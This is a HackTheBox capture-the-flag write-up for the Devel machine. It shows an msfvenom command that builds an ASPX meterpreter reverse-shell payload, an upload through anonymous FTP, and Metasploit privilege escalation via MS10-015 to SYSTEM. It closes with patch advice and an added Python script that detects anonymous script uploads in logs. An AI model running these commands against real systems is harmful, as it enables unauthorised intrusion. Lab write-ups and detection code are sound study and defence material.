Writeup - Devel (HTB)

This is a writeup for the Devel machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 21/tcp : FTP (ftpd)
  • 80/tcp : HTTP web server (Apache 2.4.41)


I start by seeing if it is possible to connect to FTP as anonymous:

In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f aspx -o shell.aspx

I upload it, then with the help of Metasploit I launch a TCP handler to create a meterpreter.

I then access my previously uploaded payload at the following address:

I now have a reverse shell on the machine.

Privilege escalation

I pause the meterpreter with CTRL+Z. Then, to try to determine some feats, I use the following module on Metasploit.

use post/multi/recon/local_exploit_suggester
set SESSION 19

The module has found a number of potential exploits.

I start by testing the first one:

use windows/local/bypassuac_eventvwr
set SESSION 19

But without success. I test the second one:

use windows/local/ms10_015_kitrap0d
set SESSION 19

This one worked; I now have a reverse shell with NT AUTHORITY\SYSTEM privileges.

The module MS10_015 is linked to CVE-2010-0232.

"[...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...]" (VK9 Security)

I can now get both flags back.


To patch this host I think it would be necessary to perform a number of actions:

  • Disable writing to the FTP server as anonymous
  • Update Windows to patch CVE-2010-0232
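
A detection check to go with the two fixes above, as an added example that is not part of the original writeup: it correlates FTP and HTTP logs to flag script files stored by an anonymous FTP user and then requested over HTTP. The log lines, the W3C-style field names, the 30-minute window and the assumption that the FTP root is the web root are all constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample logs (not from the writeup). W3C-style "#Fields:" headers
# and these field names are assumptions; adapt them to the real log layout.
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-10 09:14:02 192.0.2.10 anonymous STOR /shell.aspx 226
2024-01-10 09:20:41 192.0.2.44 deploy STOR /default.aspx 226
2024-01-10 09:31:07 192.0.2.10 anonymous STOR /notes.txt 226
2024-01-10 09:40:00 192.0.2.77 anonymous STOR /late.aspx 550
"""
HTTP_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-10 09:15:30 192.0.2.10 GET /shell.aspx 200
2024-01-10 09:21:00 198.51.100.5 GET /default.aspx 200
"""
# Extensions the web server would execute rather than serve as static content.
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

def parse_w3c(text):
    """Parse space-separated log rows using the preceding #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f'{row["date"]} {row["time"]}', "%Y-%m-%d %H:%M:%S")
            rows.append(row)
    return rows

def find_anonymous_script_uploads(ftp_text, http_text, window=timedelta(minutes=30)):
    """Return successful anonymous STORs of script files, with later HTTP hits."""
    http_rows = parse_w3c(http_text)
    findings = []
    for up in parse_w3c(ftp_text):
        path = up["cs-uri-stem"].lower()
        if (up["cs-username"].lower() not in ("anonymous", "ftp")
                or up["cs-method"].upper() != "STOR"
                or not up["sc-status"].startswith("2")   # 2xx = transfer completed
                or not path.endswith(SCRIPT_EXT)):
            continue
        # Assumes the FTP root maps to the web root, so paths compare directly.
        hits = [h["c-ip"] for h in http_rows if h["cs-uri-stem"].lower() == path
                and timedelta(0) <= h["ts"] - up["ts"] <= window]
        findings.append({"path": up["cs-uri-stem"], "uploader": up["c-ip"],
                         "uploaded": up["ts"], "executed_by": hits})
    return findings

if __name__ == "__main__":
    for f in find_anonymous_script_uploads(FTP_LOG, HTTP_LOG):
        print(f["uploaded"], f["uploader"], f["path"], "requested by", f["executed_by"])
```

A finding with a non-empty `executed_by` list means the uploaded script was actually requested through the web server and should be treated as an incident rather than a misconfiguration.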
